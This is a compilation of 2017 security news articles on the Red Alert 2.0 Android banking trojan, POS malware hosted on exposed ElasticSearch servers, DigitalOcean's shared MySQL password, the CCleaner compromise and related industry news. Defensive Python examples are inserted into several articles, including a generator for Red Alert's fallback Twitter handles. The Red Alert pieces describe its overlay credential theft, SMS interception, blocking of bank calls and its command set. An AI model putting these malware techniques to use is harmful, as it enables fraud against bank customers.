The Red Alert 2.0 Android banking malware was developed from scratch and has been offered for rent via many online hacking forums for the last few months. The authors are continuously updating it, adding new features.

Red Alert 2.0 currently targets over 60 banks and social media apps across the world, and works on Android 6.0 Marshmallow and earlier versions.
The malware implements features common to many similar threats: it is able to steal login credentials, hijack SMS messages, display an overlay on top of legitimate apps and steal contacts.

Researchers noticed that the authors also added interesting features to Red Alert 2.0, including blocking and logging all incoming calls associated with banks and financial institutions.

“Red Alert actors are regularly adding new functionality, such as blocking and logging incoming calls of banks (see image below), which could affect the process of fraud operation departments at financials that are calling users on their infected Android phone regarding potential malicious activity.” continues the post.

This would potentially allow the Red Alert malware to block the warnings of a compromised account that banks would otherwise deliver to victims.

The Red Alert banking trojan also leverages Twitter as backup C&C infrastructure when the C2 server is taken offline.

Red Alert 2.0 banking Trojan
“Another interesting vector is the use of Twitter to avoid losing bots when the C2 server is taken offline (NTD). When the bot fails to connect to the hardcoded C2 it will retrieve a new C2 from a Twitter account. ” continues SfyLabs researchers.

“This is something we have seen in the desktop banking malware world before, but the first time we see it happening in an Android banking trojan.”

Once installed on victim’s device, the malware remains silent waiting for the victim to open a banking or social media app, then it overlays the original app with a fake user interface.

The Red Alert 2.0 malware attempts to trick victims into providing login credentials by displaying a fake interface and then informing them that the authentication failed.

“Upon opening an application that is targeted by Red Alert an overlay is shown to the user. When the user tries to log in he is greeted with an error page. The credentials themselves are then sent to the C2 server. To determine when to show the overlay and which overlay to show, the topmost application is requested periodically.” continues the post.

The stolen credentials are used by the attackers to operate on behalf of the victims and initiate fraudulent transactions.

Red Alert 2.0 can also intercept SMS text messages, an ability that would allow it to bypass the two-factor authentication mechanisms implemented by banks.

To protect yourself against this threat, don't download apps from third-party app stores, never click suspicious links in SMS messages or emails, and keep your system and apps up to date.


Siemens, PAS Partner on Industrial Cybersecurity
19.9.2017 securityweek Cyber
Engineering giant Siemens and PAS, a company that specializes in cyber security solutions for industrial control systems (ICS), announced on Tuesday a new strategic partnership.

The goal of the partnership is to provide organizations with the capabilities needed to identify and inventory assets, including distributed and legacy control systems, and to provide visibility for detecting cyber threats and unauthorized engineering changes in multi-vendor environments.

The solutions offered as a result of the partnership can be ideal for fleet-wide monitoring in the oil and gas sector, which is largely unprepared to address cybersecurity risks in operational technology (OT) environments.

Eddie Habibi, founder and CEO of PAS, pointed out that security personnel in energy and oil & gas facilities are in many cases “blind” to the configuration state of most of their cyber assets.

“Siemens chose to help address this gap with our Cyber Integrity software, which provides customers with the context they need to drive targeted security responses to incidents and ultimately to harden systems that were designed, built, and deployed before cybersecurity was a design consideration,” Habibi told SecurityWeek. “Siemens understands that any managed security service that is going to reduce risk in any meaningful way must include all critical vendor assets.”

Leo Simonovich, Vice President of Global Cyber Security at Siemens, noted that the company had previously partnered with Darktrace for network intrusion detection and it has now selected PAS for its ability to provide configuration visibility into proprietary industrial control systems.

“These are the systems that have direct responsibility for controlling volatile processes and ensuring safety in an industrial facility. Most companies lack sufficient visibility into these critical endpoints,” Simonovich said. “With PAS, we aim to lift that veil and raise the security posture of our customers through visibility into proprietary assets and deep analytics for indicators of compromise.”

Siemens’ products are available as standalone services or part of the company’s comprehensive managed security offering, depending on the customer’s needs and maturity. PAS also provides comprehensive security services, but the company’s integrity, inventory and configuration management solutions can be acquired separately by organizations that have their own security operations centers (SOCs).

“Chief Information Security Officers with whom we speak want to leverage existing investments to reduce security risk,” explained Habibi. “Where PAS has an install base, Siemens is a natural add-on service that helps CISO’s gain actionable intelligence on systems that frankly are the lifeblood of critical infrastructure industries. Likewise, existing Siemens customers who will have other vendor systems in place, will have the ability to bring these systems under one security monitoring umbrella. This is unprecedented.”


Container Security Firm Aqua Raises $25 Million
19.9.2017 securityweek IT
Aqua Security, a Tel Aviv, Israel-based container security startup, today announced that it has raised $25 million in Series B funding, bringing the total amount raised by the company to $38.5 million.

Container technologies are becoming increasingly popular among IT decision makers, as they offer a means to deploy applications faster when compared to traditional methods.

Aqua’s Container Security Platform delivers a security solution for containerized environments and supports Linux and Windows containers, multiple orchestration environments, and both on-premises deployments and public clouds such as AWS, Azure and GCP.

“On a fundamental level, container security is equivalent to hypervisor security,” F5’s David Holmes explained in a 2015 SecurityWeek column.

Aqua says that it uses a combination of intelligent defaults, machine learning, and threat research to protect container-based applications.

The Series B round was led by Lightspeed Venture Partners, while existing investors Microsoft Ventures, TLV Ventures and Shlomo Kramer also participated in the round.

“The rapid rise and convergence of DevOps, containers, and microservices-based applications is an opportunity to rethink application security.” said Chris Schaepe, Partner, Lightspeed Venture Partners. “Aqua’s success in leveraging containers to improve security provides visible customer value, as evident from the impressive customer adoption that the team at Aqua achieved in a very short time.”

According to a 2015 survey of 272 IT decision makers in North America conducted by container security specialist Twistlock, 91 percent of the respondents said they were concerned about the security of containers.

Founded in 2015, Aqua says two of the 10 largest financial services companies and three of the world’s top 10 software companies are customers. The company has office locations in San Francisco, CA, Burlington, MA, and London, UK.


U.S., Moscow Seek Russian Held in Greece over Bitcoin Laundering
19.9.2017 securityweek IT
Moscow has requested the extradition of a Russian national also wanted in the United States for laundering billions of dollars through a Bitcoin exchange he operated, a judicial source said Tuesday.

Alexander Vinnik, who headed BTC-e, an exchange he operated for the Bitcoin crypto-currency, was indicted by a US court in late July on 21 charges ranging from identity theft and facilitating drug trafficking to money laundering.

He has been languishing in a Greek jail since his arrest on July 25 in the tourist resort of Halkidiki, near the northern city of Thessaloniki.

According to the judicial source, Vinnik said he would not contest Moscow's request, dated August 10. He is wanted there on separate fraud charges totalling 9,500 euros ($11,000).

According to US authorities, Vinnik, 37, "stole identities, facilitated drug trafficking, and helped to launder criminal proceeds from syndicates around the world."

In addition, BTC-e "was noted for its role in numerous ransomware and other cyber-criminal activity," receiving more than $4 billion worth of bitcoin over the course of its operation.

BTC-e, founded in 2011, became one of the world's largest and most widely used digital currency exchanges, but according to the indictment, it was "heavily reliant on criminals" engaged in identity theft and drugs, as well as corrupt public officials.

Vinnik was also charged with receiving funds from the infamous hack of Mt. Gox -- an earlier digital currency exchange that eventually failed, in part due to losses attributable to hacking.

The Treasury Department has fined BTC-e $110 million for "wilfully violating" US anti-money laundering laws, and Vinnik $12 million.

In July, Treasury Secretary Steven Mnuchin hailed Vinnik's arrest and indictment, saying that cracking down on illegal uses of the cyber currency is a key goal of US regulators.

The Greek justice system will now have to decide whether Vinnik heads to Moscow or Washington.


Google, Spotify Release Open Source Cloud Security Tools
19.9.2017 securityweek Security
Google and music service Spotify announced last week the launch of Forseti Security, a community-driven collection of open source tools designed to improve security in Google Cloud Platform (GCP) environments.

The Forseti toolkit currently includes an inventory tool that provides visibility into GCP resources, a scanner that validates access control policies, an enforcement tool that removes unwanted access to resources, and an add-on that helps users understand, test and develop Identity and Access Management (IAM) policies.

“Forseti gives us visibility into the GCP infrastructure that we didn’t have before, and we use it to help make sure we have the right controls in place and stay ahead of the game,” Spotify said.

“It helps keep us informed about what’s going on in our environment so that we can quickly find out about any risky misconfigurations so they can be fixed right away. These tools allow us to create a workflow that puts the security team in a proactive stance rather than a reactive one. We can inform everyone involved on time rather than waiting for an incident to happen,” the company added.

The Inventory tool continually generates snapshots of GCP resources and provides an audit trail. The Scanner helps detect misconfigurations and security bugs, and informs the team in charge when an issue has been discovered.
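The kind of check a policy scanner performs is easier to see in code. The following is an added example written in the spirit of the Forseti scanner described above; it is not Forseti's code and implements only a handful of checks. The policy shape (a `bindings` list of `role`/`members` entries) is the one Google Cloud's getIamPolicy returns; the allowed domain `example.com` and `SAMPLE_POLICY` are constructed for illustration.

```python
"""Flag risky bindings in a Google Cloud IAM policy.

Added example in the spirit of the Forseti scanner; not Forseti's code.
The policy shape is the getIamPolicy format; the allowed domain and
SAMPLE_POLICY below are constructed for illustration.
"""

PUBLIC_MEMBERS = {"allUsers", "allAuthenticatedUsers"}
# Primitive (basic) roles grant very broad access; prefer predefined/custom roles.
PRIMITIVE_ROLES = {"roles/owner", "roles/editor"}


def scan_policy(policy: dict, allowed_domains) -> list:
    """Return (severity, role, member, reason) tuples for every risky binding."""
    allowed = {d.lower() for d in allowed_domains}
    findings = []
    for binding in policy.get("bindings", []):
        role = binding.get("role", "")
        for member in binding.get("members", []):
            if member in PUBLIC_MEMBERS:
                findings.append(("high", role, member, "granted to the public"))
                continue
            kind, _, ident = member.partition(":")
            if kind == "domain" and ident.lower() not in allowed:
                findings.append(("high", role, member, "granted to an external domain"))
            elif kind in ("user", "group") and ident.rsplit("@", 1)[-1].lower() not in allowed:
                findings.append(("high", role, member,
                                 "granted to an identity outside the allowed domains"))
            if role in PRIMITIVE_ROLES:
                findings.append(("medium", role, member,
                                 "primitive role; use a predefined or custom role"))
    return findings


SAMPLE_POLICY = {  # constructed sample, not a real project's policy
    "bindings": [
        {"role": "roles/owner", "members": ["user:alice@example.com"]},
        {"role": "roles/viewer", "members": ["allUsers"]},
        {"role": "roles/storage.objectViewer",
         "members": ["group:devs@example.com", "user:contractor@external.example"]},
        {"role": "roles/editor",
         "members": ["serviceAccount:ci@example-project.iam.gserviceaccount.com"]},
    ]
}

if __name__ == "__main__":
    for severity, role, member, reason in scan_policy(SAMPLE_POLICY, ["example.com"]):
        print(f"[{severity}] {role} -> {member}: {reason}")
```

Run against the sample, the scanner reports the public `roles/viewer` grant and the external contractor as high, and the two primitive-role grants as medium; a real deployment would feed it the policies collected by the inventory step and route the findings to the owning team.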

Spotify started developing security tools for GCP after moving its operations from in-house data centers to the cloud. The tools are designed to help the company automate its security processes in order to enable its engineering team to develop freely and securely.

Google had been developing its own security tools and since both companies wanted to release them as open source, they decided to collaborate, which led to the creation of the Forseti Security project.

Security experts can submit feature requests and bug reports, or they can contribute to Forseti development efforts.


POS Malware Abuses Exposed ElasticSearch Nodes for C&C
19.9.2017 securityweek Virus
Two point of sale (POS) malware families have been abusing thousands of publicly accessible ElasticSearch nodes for command and control (C&C) purposes, Kromtech security researchers warn.

Malicious files discovered on the ElasticSearch deployments referenced the AlinaPOS and JackPOS malware families, which are well known for their wide use in credit card data theft campaigns. Both threats are designed to scrape credit card data from computer memory.

Both JackPOS and AlinaPOS have been around for several years and have seen numerous variants to date, each employing different techniques to steal credit card data. Already widespread, POS malware is active year-round, but usually shows spikes in activity during the holiday shopping season.

According to Kromtech, Alina is now available for sale online and some of its variants enjoy low detection rates by popular anti-virus engines (tested with VirusTotal). Even relatively old C&C server hosting sites can’t be used reliably for detection, they say.

Contributing to this situation was the fact that many ElasticSearch servers aren’t properly configured, thus allowing attackers to abuse them for their nefarious purposes. In this instance, infected servers were used as part of a larger POS botnet purposed for C&C functionality, controlling POS malware clients.

This isn’t the first time ElasticSearch nodes have made the news after falling prey to miscreants. In January this year, after tens of thousands of MongoDB databases were ransacked, hackers turned to ElasticSearch servers, deleted the data on them and demanded various ransom amounts, claiming they could restore the wiped information.

A new wave of ransomware attacks on improperly secured MongoDB deployments was observed a couple of weeks back, prompting the company to implement new security measures. Cybercriminals targeting insecure ElasticSearch servers, however, appear to have had other plans for them.

After performing a Shodan search, Kromtech discovered nearly 4000 infected ElasticSearch servers, most of which (about 99%) are hosted on Amazon.

“Why Amazon? Because on Amazon Web Services you can get a free t2 micro (EC2) instance with up to 10 Gb of disk space. At the same time t2 micro allows to set up only versions ES 1.5.2 and 2.3.2. AWS-hosted ES service gives you a possibility to configure your ES cluster just in few clicks,” the researchers note.

This also means that many of those who configured the servers didn’t pay much attention to the security configuration steps during the quick installation process. As a result, the servers remained exposed to attackers, and Kromtech found that multiple actors hit them, just as happened during the ransomware campaign at the beginning of the year.

Because the insecure ElasticSearch servers were infected multiple times, the discovered packages could be traced to different POS botnets. Since the attackers scan periodically, the time of infection could differ between servers even when the same package is involved. The most recent infections occurred at the end of August 2017.

The security researchers also discovered that 52% of infected servers run ElasticSearch version 1.5.2, while 47% run version 2.3.2. The remaining 1% run other software versions.
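The common thread in the report is nodes that answer on port 9200 to anyone, running the two versions the AWS quick-setup offered at the time. The following added example (not Kromtech's tooling) is a small audit helper an operator can run against their own Elasticsearch endpoints: the decision logic in `assess_node` is kept separate from the network probe so it can be tested offline, and only the version numbers named above (1.5.2 and 2.3.2) are used as indicators. `SAMPLE_OPEN_NODE` is a constructed response, not a capture from a real server.

```python
"""Audit an Elasticsearch node for anonymous exposure.

Added example, not Kromtech's tooling. Only the version numbers named in the
report (1.5.2 and 2.3.2) are used as indicators; SAMPLE_OPEN_NODE is constructed.
"""
import json
import urllib.error
import urllib.request

# Versions Kromtech found on the infected nodes (52% and 47% respectively).
CAMPAIGN_VERSIONS = {"1.5.2", "2.3.2"}


def assess_node(status: int, body: str) -> dict:
    """Classify the response to an unauthenticated GET on the node's root URL.

    The root document of an Elasticsearch node carries its version under
    version.number; if it is readable without credentials the node is exposed.
    """
    findings = {"anonymous_access": False, "version": None,
                "campaign_version": False, "notes": []}
    if status in (401, 403):
        findings["notes"].append("authentication required: not anonymously exposed")
        return findings
    if status != 200:
        findings["notes"].append(f"unexpected HTTP status {status}")
        return findings
    try:
        doc = json.loads(body)
    except json.JSONDecodeError:
        doc = None
    if not isinstance(doc, dict):
        findings["notes"].append("port answered but not with Elasticsearch JSON")
        return findings
    version = doc.get("version", {}).get("number")
    findings["anonymous_access"] = True
    findings["version"] = version
    findings["notes"].append("root endpoint readable without credentials")
    if version in CAMPAIGN_VERSIONS:
        findings["campaign_version"] = True
        findings["notes"].append(
            f"version {version} matches the default images abused in the campaign")
    return findings


def probe(base_url: str, timeout: float = 5.0) -> dict:
    """Fetch the root document of a node you operate and assess it."""
    req = urllib.request.Request(base_url, headers={"Accept": "application/json"})
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return assess_node(resp.status, resp.read().decode("utf-8", "replace"))
    except urllib.error.HTTPError as exc:
        return assess_node(exc.code, exc.read().decode("utf-8", "replace"))


# Constructed sample: what an unauthenticated ES 1.5.2 root endpoint returns.
SAMPLE_OPEN_NODE = json.dumps({
    "status": 200,
    "name": "Example Node",
    "cluster_name": "elasticsearch",
    "version": {"number": "1.5.2", "build_hash": "placeholder",
                "lucene_version": "4.10.4"},
    "tagline": "You Know, for Search",
})

if __name__ == "__main__":
    # e.g. probe("http://127.0.0.1:9200/") on a host you administer
    print(assess_node(200, SAMPLE_OPEN_NODE))
```

A node that comes back with `anonymous_access` set should be bound to a private interface or put behind an authenticating proxy; a `campaign_version` hit on top of that is a strong reason to inspect the indices for content the service never wrote.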


New "Red Alert" Android Banking Trojan Emerges
19.9.2017 securityweek Android
A recently discovered Android banking Trojan features a bot and command and control panel fully written from scratch, SfyLabs has discovered.

Dubbed Red Alert 2.0, the malware has been designed and distributed over the past several months by a new threat actor, the researchers say. The threat features new code but its capabilities are similar to those of other Android banking Trojans, such as the use of overlays to steal login credentials, or the ability to intercept SMS messages and steal users’ contacts.

According to SfyLabs, the Red Alert actors have been adding new functionality to the threat to ensure it continues to be effective. The mobile malware can block and log incoming calls from banks, thus ensuring that financial firms can’t contact users of the infected Android phone to alert them regarding potential malicious activity.

The malware also uses Twitter to avoid losing bots when the command and control (C&C) server is taken offline. The researchers observed that, should the bot fail to connect to the hardcoded C&C, it would retrieve a new server from a Twitter account.

This approach isn’t new to the malware world, but has been associated mainly with Windows Trojans. In fact, SfyLabs claims that Red Alert 2.0 is the first Android banking Trojan they observed to pack such functionality. Given that more and more users perform banking operations directly from their mobile devices, it’s no surprise that miscreants switch focus to Android, the most popular mobile OS.

Should the C&C server be unavailable, a connection error is triggered. Code within the malware uses the current date combined with a salt stored in strings.xml to create a new MD5 hash. The first 16 characters of the hash are used as a Twitter handle registered by the Red Alert actors. The bot requests the Twitter page of the handle and parses the response to obtain the new C&C server address.
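Because the handle derives from the date and a fixed salt, an analyst who has recovered the salt from a sample can list the handles the bot will look up on coming days and pass them to the platform's abuse team, or match them against proxy logs. The following is added analyst tooling, not the malware's code; SfyLabs describe the scheme only at the level above, so the date format, the concatenation order and `SAMPLE_SALT` are assumptions (placeholders), and `SAMPLE_PROXY_URLS` is a constructed log excerpt.

```python
"""Enumerate the fallback Twitter handles implied by the scheme above.

Added analyst tooling, not the malware's code. Date format, concatenation
order and SAMPLE_SALT are assumptions; substitute values recovered from a sample.
"""
import hashlib
import re
from datetime import date, timedelta

HANDLE_LEN = 16
HANDLE_RE = re.compile(r"^[0-9a-f]{16}$")
TWITTER_PROFILE_RE = re.compile(r"^https?://(?:www\.|mobile\.)?twitter\.com/([0-9A-Za-z_]+)/?$")

SAMPLE_SALT = "PLACEHOLDER_SALT"  # constructed; the real salt sits in the APK's strings.xml


def fallback_handle(day: date, salt: str, date_format: str = "%Y-%m-%d") -> str:
    """First 16 hex characters of MD5(date_string || salt)."""
    material = (day.strftime(date_format) + salt).encode("utf-8")
    return hashlib.md5(material).hexdigest()[:HANDLE_LEN]


def handle_schedule(start_iso: str, days: int, salt: str,
                    date_format: str = "%Y-%m-%d") -> list:
    """(ISO date, handle) pairs for `days` consecutive days from `start_iso`."""
    start = date.fromisoformat(start_iso)
    schedule = []
    for offset in range(days):
        day = start + timedelta(days=offset)
        schedule.append((day.isoformat(), fallback_handle(day, salt, date_format)))
    return schedule


def matching_profile_fetches(urls, handles) -> list:
    """URLs (e.g. from a proxy log) that fetch a scheduled handle's profile page.

    A device fetching one of these pages is a candidate for closer inspection.
    """
    wanted = {h.lower() for h in handles}
    hits = []
    for url in urls:
        m = TWITTER_PROFILE_RE.match(url.strip())
        if m and m.group(1).lower() in wanted:
            hits.append(url)
    return hits


# Constructed proxy-log excerpt: one fetch of the day's handle, two benign lines.
SAMPLE_PROXY_URLS = [
    "https://twitter.com/" + fallback_handle(date(2017, 9, 19), SAMPLE_SALT),
    "https://twitter.com/securityweek",
    "https://example.com/",
]

if __name__ == "__main__":
    schedule = handle_schedule("2017-09-19", 7, SAMPLE_SALT)
    for day, handle in schedule:
        print(day, handle)
    print("suspicious fetches:",
          matching_profile_fetches(SAMPLE_PROXY_URLS, [h for _, h in schedule]))
```

The schedule is only as good as the recovered parameters: if the sample formats the date differently or appends the salt in the other order, every handle changes, which is why the assumptions are isolated in `fallback_handle`'s arguments.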

Unlike other Android banking Trojans that use overlays to steal login credentials, Red Alert 2.0 doesn’t receive the full list of targets from its C&C server. Keeping that list only on the server makes it more difficult to determine which banks the threat targets, but SfyLabs uncovered around 60 HTML overlays the actor is using at the moment.

Once the user launches a targeted application on an infected Android device, the malware displays an overlay page that mimics the legitimate one. However, when the user tries to log in, an error page is displayed, while the entered credentials are sent to the C&C server.

To know when to display the overlay and which fake page to show, the malware requests the topmost application periodically. On Android 5.0 and higher devices, the malware uses Android toolbox for this activity, an approach different from those used by Android Trojans such as Mazar, Exobot and BankBot, the security researchers explain.

The security researchers also discovered that the attackers can control the Trojan through commands sent directly from the C&C server. Commands include start/stop SMS interception, send SMS, set/reset default SMS, get SMS/call/contact list, set admin, launch app, send USSD, and block and notify.

Observed samples would masquerade as Flash Player updates, popular applications such as WhatsApp and Viber, Google Market update, and even Android system updates.


Ex-porn Actor German Spy Guilty of Trying to Share State Secrets
19.9.2017 securityweek Hacking
A former German intelligence agent who was also an ex-gay porn actor was Tuesday given a one-year suspended sentence for attempting to share state secrets while pretending to be a jihadist online.

The 52-year-old, named as Roque M., made headlines when he was arrested last November in what initially appeared to be a case of an Islamist mole at work in Germany's domestic spy agency.

But he was freed in July after prosecutors dropped most of the charges, finding no evidence of an attack plot or ties to Islamist groups.

He told the court that he pretended to be a jihadist planning an attack in online chatrooms because he was bored.

"I never met with any Islamists. I would never do that. The whole thing was like a game," the suspect said at the start of his trial in the western city of Duesseldorf.

A former banker and a father-of-four, Roque M. told the court that he monitored the Islamist scene as part of his job for the Office for the Protection of the Constitution (BfV), a role he described as "a lot of fun".

But he said he grew bored on weekends when he was at home watching his disabled son, and immersed himself in the online world of Islamists, feigning to be one himself.

It was "an escape from reality," he said in court.

He even went so far as to arrange a meeting with a suspected Islamist at a gym, although Roque M. insisted he never had any intention of going.

He was caught after he offered to share classified information about BfV operations with someone who turned out to be a colleague working undercover.

The case initially sparked outrage, with Germany's domestic spy agency fending off calls for a complete security overhaul for allowing an "Islamist" who had passed multiple screenings to infiltrate its team.

The intelligence agent's colourful past as a gay porn actor also enthralled the public.

But as no evidence emerged of an actual Islamist plot, prosecutors left Roque M. facing the sole charge of attempting to share state secrets.


DigitalOcean Warns of Vulnerability Affecting Cloud Users
19.9.2017 securityweek Hacking
DigitalOcean is warning customers that some 1-Click applications running MySQL have an account with the same default password across all instances, and the company says the issue affects other cloud providers as well.

DigitalOcean customers reported on social media that they received an email recommending that they run a script to determine if their Droplets – the name used by the company for its cloud servers – are affected by the vulnerability.

The company allows its users to deploy pre-built and pre-configured applications with only one click. The list of 1-Click (One-Click) applications includes Node.js, Rails, Redis, MongoDB, Docker, GitLab, Magento and many others.

DigitalOcean discovered that 1-Click applications running MySQL on Debian and Ubuntu create a MySQL user named “debian-sys-maint” that has the same password on all Droplets created from a 1-Click image.

The “debian-sys-maint” user is designed for local administration purposes and it should have a random password. However, due to a bug, all instances of an application created from the same 1-Click image have the same password.

DigitalOcean said the vulnerability, which is “potentially remotely exploitable,” affects MySQL and several other applications that use MySQL, including PHPMyAdmin, LAMP, LEMP, WordPress and OwnCloud.

“We will be issuing a public notice regarding this issue, but first wanted to ensure our impacted users had time to take action,” the company said in its email to customers. “As part of our verification process, we have discovered that images on other cloud providers also have this mis-configuration.”

DigitalOcean has provided a script that allows users to determine if their Droplets are affected and updates their password if needed. The script works on Ubuntu 14, 16 and 17, and Debian 7 and 8; Debian 9 is not impacted.

Customers who have changed the password for the “debian-sys-maint” user after installation of a 1-Click app are not affected by the flaw and they don’t need to take any action.

“We have changed our 1-Clicks to ensure that all future Droplets will have unique, auto-generated passwords for this user,” DigitalOcean said.
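As an added illustration of the check and fix described above (this is not DigitalOcean's script, which is not reproduced here), the following Python code parses a `/etc/mysql/debian.cnf`-style file, fingerprints the `debian-sys-maint` password so that many Droplets can be compared for a shared credential without the password itself leaving the host, generates a fresh random password, and produces both the rewritten config and the SQL statement to apply on the server. The sample config contents, the password in it and the host names are constructed for the example.

```python
import configparser
import hashlib
import secrets
import string
from collections import defaultdict

# Constructed sample of /etc/mysql/debian.cnf in the shape Debian/Ubuntu packaging writes it.
# The password value is made up for this example; it is not the real shared default.
SAMPLE_DEBIAN_CNF = """\
# Automatically generated for Debian scripts. DO NOT TOUCH!
[client]
host     = localhost
user     = debian-sys-maint
password = SharedImagePassword123
socket   = /var/run/mysqld/mysqld.sock
[mysql_upgrade]
host     = localhost
user     = debian-sys-maint
password = SharedImagePassword123
socket   = /var/run/mysqld/mysqld.sock
basedir  = /usr
"""

# Letters and digits only, so the value needs no escaping inside a single-quoted SQL literal.
ALPHABET = string.ascii_letters + string.digits


def read_debian_cnf(text: str) -> configparser.ConfigParser:
    cfg = configparser.ConfigParser(interpolation=None)
    cfg.read_string(text)
    return cfg


def password_fingerprint(text: str) -> str:
    """SHA-256 of the [client] password: safe to collect from every host and compare centrally."""
    return hashlib.sha256(read_debian_cnf(text)["client"]["password"].encode()).hexdigest()


def hosts_sharing_passwords(fingerprints: dict) -> dict:
    """Group hosts by fingerprint; any group with more than one host shares a credential."""
    groups = defaultdict(list)
    for host, fp in fingerprints.items():
        groups[fp].append(host)
    return {fp: sorted(hosts) for fp, hosts in groups.items() if len(hosts) > 1}


def generate_password(length: int = 32) -> str:
    return "".join(secrets.choice(ALPHABET) for _ in range(length))


def rotated_debian_cnf(text: str, new_password: str) -> str:
    """Rewrite every 'password = ...' line (both sections) and keep everything else as it was."""
    out = []
    for line in text.splitlines():
        if line.split("=", 1)[0].strip() == "password":
            out.append(f"password = {new_password}")
        else:
            out.append(line)
    return "\n".join(out) + "\n"


def change_password_sql(new_password: str, legacy: bool = False) -> str:
    """Statement to run as root. ALTER USER needs MySQL 5.7+; legacy=True gives the 5.5/5.6 form."""
    if not all(c in ALPHABET for c in new_password):
        raise ValueError("password must stay within the unquoted alphabet")
    if legacy:
        return f"SET PASSWORD FOR 'debian-sys-maint'@'localhost' = PASSWORD('{new_password}');"
    return f"ALTER USER 'debian-sys-maint'@'localhost' IDENTIFIED BY '{new_password}';"


def rotation_plan(cnf_text: str, legacy: bool = False) -> dict:
    """Everything an operator needs: the new secret, the new config file and the SQL to apply first."""
    new_password = generate_password()
    return {
        "password": new_password,
        "debian_cnf": rotated_debian_cnf(cnf_text, new_password),
        "sql": change_password_sql(new_password, legacy),
    }


if __name__ == "__main__":
    # Two constructed Droplets built from the same image report identical fingerprints.
    fleet = {"droplet-a": password_fingerprint(SAMPLE_DEBIAN_CNF),
             "droplet-b": password_fingerprint(SAMPLE_DEBIAN_CNF)}
    print("shared credentials:", hosts_sharing_passwords(fleet))
    plan = rotation_plan(SAMPLE_DEBIAN_CNF)
    print(plan["sql"])
    print(plan["debian_cnf"])
```

Apply the SQL first and only then write the new `debian.cnf`, otherwise the Debian maintenance scripts that read the file lose access to the server between the two steps. The fingerprint approach is also a useful fleet-wide check after the fix: once every instance has a unique password, `hosts_sharing_passwords` should return an empty dict.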


CCleaner Server Was Compromised in Early July
19.9.2017 securityweek Hacking
A server distributing a version of PC utility CCleaner infected with malware might have been compromised in early July, Avast revealed.

Two versions of the highly popular Windows maintenance tool (32-bit CCleaner v5.33.6162 and CCleaner Cloud v1.07.3191) were modified to distribute information stealing malware, and over 2 million users have been impacted by the incident. The infected binary was released on August 15 and remained undetected for four weeks.

CCleaner was developed by Piriform, which was acquired by anti-virus company Avast in July 2017. After news of the infected installer broke on Monday, the security firm decided to step forward and clarify that the compromise likely happened before the July acquisition.

“Before we completed the acquisition, the bad actors were likely already in the process of hacking into the Piriform systems. The compromise may have started on July 3rd. The server was provisioned earlier in 2017 and the SSL certificate for the respective https communication had a timestamp of July 3, 2017,” an Avast blog post signed by Vince Steckler, CEO, and Ondrej Vlcek, CTO and EVP Consumer Business, reads.

The company also disclosed that they were warned of the infection by security company Morphisec, which says that it first encountered the malicious CCleaner installations on Aug. 20. However, it was only on Sept. 11 that Morphisec received logs from some of its customers and could start an investigation.

On Sept. 12, Morphisec warned Avast of the infection, and the latter was able to resolve the issue within 72 hours. By Sept. 15, the command and control server that the malware was contacting had been taken down and Piriform had already released a clean version of CCleaner.

Avast also claims that no actual harm was done to the impacted computers, despite the fact that 2.27 million users downloaded the infected application release, as the final payload in this attack never activated.

“About 30% of CCleaner users also run Avast security software, which enables us to analyze behavioral, traffic and file/registry data from those machines. Based on the analysis of this data, we believe that the second stage payload never activated, i.e. the only malicious code present on customer machines was the one embedded in the ccleaner.exe binary,” the company says.

CCleaner v5.34 and CCleaner Cloud v1.07.3214 have been released without the malicious code inside, and Avast says that only around 730,000 users are still running the affected version 5.33.6162 on their systems. The free CCleaner variant doesn’t include automatic updates, meaning that users need to manually download and install the clean version.

“We deeply understand the seriousness of the situation, as we do with all security threats. We regret the inconvenience experienced by Piriform’s customers. We plan to be issuing more updates on this as we go. We have made it our highest priority to properly investigate this unfortunate incident and to take all possible measures to ensure that it never happens again,” Avast also says.

Affected users are advised to update to the latest versions of CCleaner as soon as possible, to remove any malicious code from their computers.


New York Pushes to Regulate Credit Agencies After Equifax Breach
19.9.2017 securityweek CyberCrime
New York Governor Andrew Cuomo announced on Monday plans to make credit reporting firms comply with the 23 NYCRR 500 cybersecurity regulations enacted earlier this year. The move is in response to the massive Equifax breach disclosed on September 7, 2017.

"In response to the recent cyberattack that exposed the personal private data of nearly 150 million consumers nationwide, Governor Andrew M. Cuomo today directed the Department of Financial Services to issue new regulation making credit reporting agencies to register with New York for the first time and comply with this state's first-in-the-nation cybersecurity standard," says the statement.

"A person's credit history affects virtually every part of their lives and we will not sit idle by while New Yorkers remain unprotected from cyberattacks due to lax security," Governor Cuomo said. "Oversight of credit reporting agencies will help ensure that personal information is less vulnerable to cyberattacks and other nefarious acts in this rapidly changing digital world. The Equifax breach was a wakeup call and with this action New York is raising the bar for consumer protections that we hope will be replicated across the nation."

In the proposed new regulation (PDF), Maria T. Vullo, Superintendent of Financial Services, makes it clear that her department has been monitoring 'the deficient practices' of credit reporting companies (such as Equifax, Experian and TransUnion). She cites failure to safeguard consumer data; failure to maintain accurate data; and failure to investigate alleged inaccuracies.

Her proposed solution is to require the credit companies to register with the DFS, to comply with certain prohibited practices, and to comply with the regulations introduced in DFS 500. Failure to comply with this new regulation (23 NYCRR 201) could lead to the revocation of the credit company's authorization to do business with New York's regulated financial institutions and consumers -- effectively making it impossible to carry on.

"The data breach at Equifax demonstrates the necessity of strong state regulation like New York's first-in-the-nation cybersecurity actions," said Financial Services Superintendent Maria T. Vullo. "This is one necessary action of several that DFS will take to protect New York's markets, consumers and sensitive information from criminals."

It is thought that 8 million New Yorkers may be affected by the Equifax breach.

'First-in-the-nation' is how New York describes the DFS 500 regulation. Its two key requirements are that regulated companies (covered entities) must employ a chief information security officer, and that they must deliver an annual cybersecurity report signed off by the board with a certification document to the DFS. The CISO "shall report in writing at least annually to the Covered Entity's board of directors or equivalent governing body." This will effectively be a statement on how the regulation is implemented, including details on 'material Cybersecurity Events'.

The process effectively makes the DFS the final arbiter on the adequacy of the regulated companies' cybersecurity policies; and the new proposal brings credit reporting agencies in line with the requirements for the regulated financial services organizations.

The proposed new regulation also introduces a new range of prohibitions on credit reporting agencies designed to protect consumers. These prohibit "any unfair, deceptive or predatory act or practice toward any consumer... violation of section 1036 of the Dodd-Frank Wall Street Reform and Consumer Protection Act..." and "Making any false statement or make any omission of a material fact in connection with any information or reports filed with a governmental agency or in connection with any investigation conducted by the superintendent or another governmental agency."

